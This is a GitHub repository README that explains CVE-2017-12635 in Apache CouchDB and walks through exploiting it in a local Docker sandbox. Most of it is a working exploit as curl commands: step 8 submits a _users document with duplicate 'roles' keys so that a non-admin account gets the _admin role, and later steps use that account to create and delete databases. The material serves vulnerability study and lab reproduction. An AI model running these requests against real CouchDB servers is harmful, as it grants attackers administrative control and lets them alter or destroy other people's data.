Skip to content

tranmanhdat/couchdb_cve-2017-12635

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
README.md
README.md
 
 

Repository files navigation

Apache CouchDB 1.7.0 / 2.x < 2.1.1 - CVE-2017-12635 - Remote Privilege Escalation

Detail

  • Apache CouchDB is a document-oriented NoSQL database, implemented in Erlang.
  • Due to the discrepancy between the Erlang-based JSON parser and JavaScript-based JSON parser, there was a vulnerability in CouchDB before 1.7.0 and 2.x before 2.1.1 allowing non-admin users to escalate privilege by submitting _users documents with duplicate roles keys used for access control within the databases, including the special case_admin role, that denotes administrative users.
    To recap, the vulnerability allows non-admin users to give themselves admin privileges.
  • CouchDB uses special database (called _users by default) to store information about registered users. This is a system database – this means that while it shares common database API, there are some special security-related constraints applied and used agreements on documents structure.
    Only administrators may GET, PUT or DELETE any document in_users database.
    Users may only access (GET /_users/org.couchdb.user:<username>) or modify (PUT /_users/org.couchdb.user:<username>) documents that they owns.

Steps to exploit

  1. Run docker image:
    docker container run -d --name couchdb-sandbox -p 5984:5984 couchdb:1.6.1

  2. Check sure the CouchDB instance is launched and working
    curl -X GET http://localhost:5984

  3. Query: All databases in the instance
    curl -X GET http://localhost:5984/_all_dbs

  4. Query: Create an admin account with credentials admin:admin
    curl -X PUT http://localhost:5984/_config/admins/admin -d '"admin"'

  5. Query: Try create a new database named records
    curl -X PUT http://localhost:5984/records
    We cant create because dont have admin account

  6. Query: Create a new database named records with admin authentication
    curl -X PUT http://admin:admin@localhost:5984/records

  7. Query: Create a new document in _users database

    curl -X PUT http://localhost:5984/_users/org.couchdb.user:guest \
 -H "Accept: application/json" \
 -H "Content-Type: application/json" \
 -d '{"name": "guest", "password": "guest", "roles": ["_admin"], "type": "user"}'

    We cant create an account with admin role

  8. Query: Create a new document in _users database with admin role

    curl -X PUT http://localhost:5984/_users/org.couchdb.user:guest \
-H "Accept: application/json" \
-H "Content-Type: application/json" \
-d '{"name": "guest", "password": "guest", "roles": ["_admin"], "roles": [], "type": "user"}'

    we have an admin account now!

  9. Query: Create a new database named new_recorDs with guest authentication
    curl -X PUT http://guest:guest@localhost:5984/new_records

  10. Query: Delete the database named new_records with guest authentication
    curl -X DELETE http://guest:guest@localhost:5984/new_records

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

2 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published